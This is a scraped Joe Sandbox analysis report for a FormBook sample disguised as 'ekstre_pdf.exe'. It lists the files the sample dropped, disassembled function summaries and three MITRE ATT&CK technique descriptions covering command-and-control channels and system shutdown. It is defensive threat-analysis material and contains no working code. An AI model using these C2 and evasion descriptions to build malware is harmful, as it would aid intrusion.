Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ekstre_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\Falcinellus.Ter

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\battery-level-100-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\bluetooth-hardware-disabled-symbolic.symbolic.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\changes-prevent-symbolic.symbolic.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\display-projector-symbolic.symbolic.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\go-previous-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\network-cellular-signal-ok-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\task-past-due-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\view-grid-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\weather-showers-scattered-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Elfenbenshvide.Fra179

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\audio-headset-symbolic.symbolic.png

C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll

C:\Users\user\AppData\Roaming\DORME.ini

Static File Info

Windows Analysis Report
ekstre_pdf.exe

Function 0040352D Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 450
stringfilecomCOMMON

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 6ED62351 Relevance: 18.7, APIs: 12, Instructions: 705
stringlibrarymemoryCOMMONCrypto

Function 00405C49 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00405A6E Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BEC Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 215
stringregistryCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre